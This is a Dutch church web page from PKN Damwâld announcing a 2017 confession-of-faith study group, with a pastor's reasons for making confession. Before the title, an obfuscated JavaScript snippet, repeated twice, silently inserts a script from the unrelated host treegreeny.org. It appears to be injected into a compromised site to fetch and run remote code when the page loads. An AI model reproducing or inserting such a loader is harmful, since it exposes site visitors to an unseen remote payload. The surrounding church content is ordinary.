;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); BELIJDENIS ... DOEN ! - PKN Damwâld
3 oktober 2017
19:30 t/m 21:00
de Ontmoeting
BELIJDENIS … DOEN !

Elk jaar proberen we mensen te stimuleren om belijdenis van het geloof te doen. Waarom? In de eerste plaats omdat dat bijbels is. Jezus vroeg van zijn volgelingen, dat ze zouden uitkomen voor zijn naam. En de apostelen riepen mensen op om een keuze te maken voor God. In de tweede plaats omdat het goed voor je is. Het is belangrijk om op een moment in je leven te zeggen: hier sta ik voor en hier ga ik voor. Dat maakt je geloof vaster. In de derde plaats is het belangrijk voor de kerk. Als mensen belijdenis doen, is dat voor de anderen inspirerend en bemoedigend. Ze zijn blij dat ze nu echt mogen horen, wat ze misschien allang hoopten en vermoedden: hij/zij wil echt bij ons horen. In de vierde plaats is het voor de buitenwereld een teken. Dat er nog steeds mensen voor God kiezen, dat kunnen ze soms niet erg geloven. Maar dat er weer mensen opstaan om ja te zeggen tegen de Heer laat zien, dat het geloof nog steeds leeft. In de vijfde plaats is het bijzonder voor God. Net zoals bij het trouwen de bruid en de bruidegom elkaar gelukkig maken, maken we God gelukkig met ons jawoord: Hij heeft ons al lang ten huwelijk gevraagd, maar nu mag Hij het officieel horen (ook al kende Hij ons hart, het voegt toch iets toe!).
Ik zou nog wel meer goede redenen kunnen bedenken, maar laat dit genoeg zijn, om voor dit jaar weer een belijdeniskring aan te bieden. Tot mijn vreugde heb ik zelfs al een aantal mensen gesproken, die dit jaar mee willen doen. Ik heb daarom een datum gereserveerd om bij elkaar te komen, want je moet ergens beginnen. Die datum is dinsdag 3 oktober om half acht in De Ontmoeting. Nu is het natuurlijk mogelijk, dat je juist dan niet kunt: niet erg, maar meld je dan wel even bij me. Want op deze eerste avond spreken we af wat het beste tijdstip is (dat kan dus ook een andere avond worden) en ook waar we het in elk geval over moeten hebben. Want een belijdeniskring is een mooie gelegenheid om stappen te zetten in je geloof, en verder te komen in wat je er lastig aan vindt. Ik wil daar in elk geval graag in helpen. Je kunt me bereiken door me aan te spreken, door me te bellen (424842) of me te mailen: Klik hier .
Ds. S. Boukes

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld